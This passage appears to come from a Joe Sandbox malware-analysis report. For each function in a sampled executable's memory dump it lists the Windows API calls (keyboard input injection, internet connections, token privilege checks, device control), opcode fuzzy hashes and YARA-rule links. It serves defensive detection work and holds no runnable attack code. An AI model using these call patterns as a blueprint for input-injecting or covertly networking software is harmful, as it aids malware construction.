CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0026BF58

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c28bb9487d556188e0cd954abcc77bb684d5cd04b00e737b10de454f941762b7
Instruction ID: b19e6729902a9c9e23a77fc11a8bc9b79aa80f7469e21963d6233598b0d6f1f1
Opcode Fuzzy Hash: c28bb9487d556188e0cd954abcc77bb684d5cd04b00e737b10de454f941762b7
Instruction Fuzzy Hash: 1A413875610A11DFCB11EF14C485A59BBE1EF89324B08C488ED499B7A2CB31FD92CF91

Function 00288E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00288F03

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: b2461e67895904bd06ae7e51482fa115d31c4bae45749adcf98ef25e6101ee24
Instruction ID: a11c71da668dab9798f37d2d69e7fe8d49067a63d621101f10e831bb4f05dc5e
Opcode Fuzzy Hash: b2461e67895904bd06ae7e51482fa115d31c4bae45749adcf98ef25e6101ee24
Instruction Fuzzy Hash: FC31A03863610AAEEB30AE14DC89FA837A6EB15310FD44502FB11D69E1CF70E970DB51

Function 0028B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0028B1D2
GetWindowRect.USER32(?,?), ref: 0028B248
PtInRect.USER32(?,?,0028C6BC), ref: 0028B258
MessageBeep.USER32(00000000), ref: 0028B2C9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 1559f7aa58823671d8f98776627623f8e2f0be61c49e264df6c3646db3a86294
Instruction ID: 17a7a45ba0f542eb377406d18c959e0a67e4815aa2ccbb234774486b3518c11b
Opcode Fuzzy Hash: 1559f7aa58823671d8f98776627623f8e2f0be61c49e264df6c3646db3a86294
Instruction Fuzzy Hash: A441C33861510ADFDB12DF58D888E5D7BF5FF49311F1441ADE9289B298D330A811DF50

Function 002612D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00261326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00261342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002613A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 002613FA

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: be751e0fd3ee1e02ff3b91331bfcb784f210d3b5f00872cbdd237a8e5b8daa01
Instruction ID: 3740a48ce326aee61ab27f8698705c7953c5080ba97921840be9b61c5174b680
Opcode Fuzzy Hash: be751e0fd3ee1e02ff3b91331bfcb784f210d3b5f00872cbdd237a8e5b8daa01
Instruction Fuzzy Hash: 3E314D30960249AEFF318E258C097FE7BB9AB44310F0C429AE492527D5D3746DF19B95

Function 00261410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00261465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00261481
PostMessageW.USER32(00000000,00000101,00000000), ref: 002614E0
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00261532

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 45a85bdc7d0b608ad17125746c0c90c66e16f13380e960cb5a6cd46daaceab8a
Instruction ID: 3d1ca122558a2b37d474b4d88b1bf35903a0651ba959f395571837c715271bb2
Opcode Fuzzy Hash: 45a85bdc7d0b608ad17125746c0c90c66e16f13380e960cb5a6cd46daaceab8a
Instruction Fuzzy Hash: C8315A30D6024A5EFF348E659C08BFABBA5AB85310F4C431BE481531D1C774ADF1ABA1

Function 002363F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0023642B
__isleadbyte_l.LIBCMT ref: 00236459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00236487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002364BD

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e4da7d14793a330d21a6643492020d799888ebb8e3c9553380d942ff20da2804
Instruction ID: 0ca13228b846fefabaa43a7e1383e5afc7160bc8d08d629a249eb52672141f19
Opcode Fuzzy Hash: e4da7d14793a330d21a6643492020d799888ebb8e3c9553380d942ff20da2804
Instruction Fuzzy Hash: 6531E1B0A20256BFDB318F64CC48BAA7BA9FF41310F158029EA2487191DB31E860DB50

Function 0028552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0028553F

Part of subcall function 00263B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00263B4E
Part of subcall function 00263B34: GetCurrentThreadId.KERNEL32 ref: 00263B55
Part of subcall function 00263B34: AttachThreadInput.USER32(00000000,?,002655C0), ref: 00263B5C

GetCaretPos.USER32(?), ref: 00285550
ClientToScreen.USER32(00000000,?), ref: 0028558B
GetForegroundWindow.USER32 ref: 00285591

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: c257fe0596f6ec1030ad55d9a993ed0c991dd8195a0c6c21d04df1179a066b8a
Instruction ID: a290d7143c49a7d5312d000654099e1a1de8c3d8e93212ed1125c27120719b02
Opcode Fuzzy Hash: c257fe0596f6ec1030ad55d9a993ed0c991dd8195a0c6c21d04df1179a066b8a
Instruction Fuzzy Hash: 883121B1910218AFDB00EFA5D8859EFB7F9EF54304F10806AE515E7241DA75AE548FA0

Function 0028CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002029E2: GetWindowLongW.USER32(?,000000EB), ref: 002029F3

GetCursorPos.USER32(?), ref: 0028CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0023BCEC,?,?,?,?,?), ref: 0028CB8F
GetCursorPos.USER32(?), ref: 0028CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0023BCEC,?,?,?), ref: 0028CC16

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 5456b10191c38e7cd02f2767f7a9bbead0485b03e3568fd4609dec612a05bb6c
Instruction ID: 907ae6177db358321d1e85ef0581e789b203323d72acd299243019b3c738f640
Opcode Fuzzy Hash: 5456b10191c38e7cd02f2767f7a9bbead0485b03e3568fd4609dec612a05bb6c
Instruction Fuzzy Hash: 7631D239621518AFCB159F54DC89EFE7BB5FB09310F14409AF905972A1C3315D60EFA0

Function 00220BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00220BE2

Part of subcall function 0021402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00267E51,?,?,00000000), ref: 00214041
Part of subcall function 0021402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00267E51,?,?,00000000,?,?), ref: 00214065

_fprintf.LIBCMT ref: 00220C19
OutputDebugStringW.KERNEL32(?), ref: 0025694C

Part of subcall function 00224CCA: _flsall.LIBCMT ref: 00224CE3

__setmode.LIBCMT ref: 00220C4E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 3b00699c3a143136e08ec3056c56300ad8d0baf3649ab52e2a312ebefe4c32f8
Instruction ID: e7eabea167ef71495b1362bed3d2fd82f00858073761b6e787eaaf9b5ba15b2d
Opcode Fuzzy Hash: 3b00699c3a143136e08ec3056c56300ad8d0baf3649ab52e2a312ebefe4c32f8
Instruction Fuzzy Hash: 541154B29242287ECB08B7E4BC869BEBB689F44321F100116F604571C2DF7119B68BA1

Function 00259274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00258D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00258D3F
Part of subcall function 00258D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00258D49
Part of subcall function 00258D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00258D58
Part of subcall function 00258D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00258D5F
Part of subcall function 00258D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00258D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002592C1
_memcmp.LIBCMT ref: 002592E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0025931A
HeapFree.KERNEL32(00000000), ref: 00259321

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 3783de0fbdcc28d52e6367ff450c4477a741adbe503e2931f4160b4e288618c9
Instruction ID: 4f834f7e1c628bdf325fe3dc7c350f7e8408795df8234fa6605e447d997201a5
Opcode Fuzzy Hash: 3783de0fbdcc28d52e6367ff450c4477a741adbe503e2931f4160b4e288618c9
Instruction Fuzzy Hash: 8E219D72E50109FFDB10DFA4D949BEEB7B8EF44302F044099E845A7290D770AA59DF94

Function 00271E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00271E6F

Part of subcall function 00271EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00271F18
Part of subcall function 00271EF9: InternetCloseHandle.WININET(00000000), ref: 00271FB5

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 45ce23f984f1b2338ea89677e57e330818b7b2423c10240af8bc95678186cc93
Instruction ID: a489b70f40f9d839c8178a62c1d5a02c261a34dfdd37ba50b76cc8d1d0cba1ed
Opcode Fuzzy Hash: 45ce23f984f1b2338ea89677e57e330818b7b2423c10240af8bc95678186cc93
Instruction Fuzzy Hash: 3F219F31210606BFEB129F659C41FBBB7AEBF84710F10811AFE4996650DB71E8319B90

Function 0028634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 002863BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 002863D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 002863E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002863F3

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 1f761d4b29f8dbc1335cb68c7e3a730733c754b70e47cc1b7acfcf4e300ade58
Instruction ID: a9711ba6b4ae69b8ba72092b42eb1c12f09a57973db54bb0a9c425135672eb45
Opcode Fuzzy Hash: 1f761d4b29f8dbc1335cb68c7e3a730733c754b70e47cc1b7acfcf4e300ade58
Instruction Fuzzy Hash: F611EE35326514AFDB00BB24DC49FBA77A9EF85720F144159F916CB2D2CBA0AD20CF94

Function 0025E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0025F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0025E46F,?,?,?,0025F262,00000000,000000EF,00000119,?,?), ref: 0025F867
Part of subcall function 0025F858: lstrcpyW.KERNEL32(00000000,?), ref: 0025F88D
Part of subcall function 0025F858: lstrcmpiW.KERNEL32(00000000,?,0025E46F,?,?,?,0025F262,00000000,000000EF,00000119,?,?), ref: 0025F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0025F262,00000000,000000EF,00000119,?,?,00000000), ref: 0025E488
lstrcpyW.KERNEL32(00000000,?), ref: 0025E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,0025F262,00000000,000000EF,00000119,?,?,00000000), ref: 0025E4E2

Strings

cdecl, xrefs: 0025E4D9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 70b586e4d40d3f1f1977ae17caf2aabdd6d2ec39aedd0a74c7891e880b7a827e
Instruction ID: 6aa503048324862e12e0e86929eb742fd5bdef3674ed2a9a1108dc7abe94ab1e
Opcode Fuzzy Hash: 70b586e4d40d3f1f1977ae17caf2aabdd6d2ec39aedd0a74c7891e880b7a827e
Instruction Fuzzy Hash: E711B13A110345BFCF259F24D849D7A77A9FF45350B81402AFC0ACB2A0EB719A64CBA5

Function 00235312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00235331

Part of subcall function 0022593C: __FF_MSGBANNER.LIBCMT ref: 00225953
Part of subcall function 0022593C: __NMSG_WRITE.LIBCMT ref: 0022595A
Part of subcall function 0022593C: RtlAllocateHeap.NTDLL(01510000,00000000,00000001,?,00000004,?,?,00221003,?), ref: 0022597F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d0702d4382ae71d7e13a9d5fc30fafa6d93a00b51ee086a9d6e33738a89cdcd5
Instruction ID: a1dfa600a5c4dbda36a1a1b8940aa78076ec196bcc73679dcbd4e3af899e19a7
Opcode Fuzzy Hash: d0702d4382ae71d7e13a9d5fc30fafa6d93a00b51ee086a9d6e33738a89cdcd5
Instruction Fuzzy Hash: B411A772536A3ABFCB203FB0FC4565A37D49F543A0F5045A6F85C9A190DEB8C9748B90

Function 00264365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00264385
_memset.LIBCMT ref: 002643A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002643F8
CloseHandle.KERNEL32(00000000), ref: 00264401

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 269a0737250b841cef867feaa058069348fde9267ee911da91bb566e0558ee9c
Instruction ID: 085539792b8037b7c4b21c5e4746a042878e7d8ffc751164b86f8f6c3bc9aa9b
Opcode Fuzzy Hash: 269a0737250b841cef867feaa058069348fde9267ee911da91bb566e0558ee9c
Instruction Fuzzy Hash: 2711EB7191122C7AD7309BA5AC4DFEBBB7CEF45720F1045DAF908E7290D6744E808BA4

Function 00276A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0021402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00267E51,?,?,00000000), ref: 00214041
Part of subcall function 0021402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00267E51,?,?,00000000,?,?), ref: 00214065

gethostbyname.WSOCK32(?,?,?), ref: 00276A84
WSAGetLastError.WSOCK32(00000000), ref: 00276A8F
_memmove.LIBCMT ref: 00276ABC
inet_ntoa.WSOCK32(?), ref: 00276AC7

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: f71b1c4cf858791f0c0e581b209b5caa7da00c3cb0e15d36c15ea2f485e3b107
Instruction ID: fceef273cf94950166af42717c9ad38ddfec97a734d42a23454018d5502612e8
Opcode Fuzzy Hash: f71b1c4cf858791f0c0e581b209b5caa7da00c3cb0e15d36c15ea2f485e3b107
Instruction Fuzzy Hash: 65115472910109AFCB04FBA4DD8ACEE77B8AF14311B148055F505A71A2DF309E64CF91

Function 0020166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 002029E2: GetWindowLongW.USER32(?,000000EB), ref: 002029F3

DefDlgProcW.USER32(?,00000020,?), ref: 002016B4
GetClientRect.USER32(?,?), ref: 0023B93C
GetCursorPos.USER32(?), ref: 0023B946
ScreenToClient.USER32(?,?), ref: 0023B951

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 434645b4f853b18efcca52cbbdaf31de7e7cdc41de85d2ebc7ec469a705c9a02
Instruction ID: cbb59812a0bc030dc3fc0deeb6ec593c4342acdbf52b5e4dedb4477e33d676ee
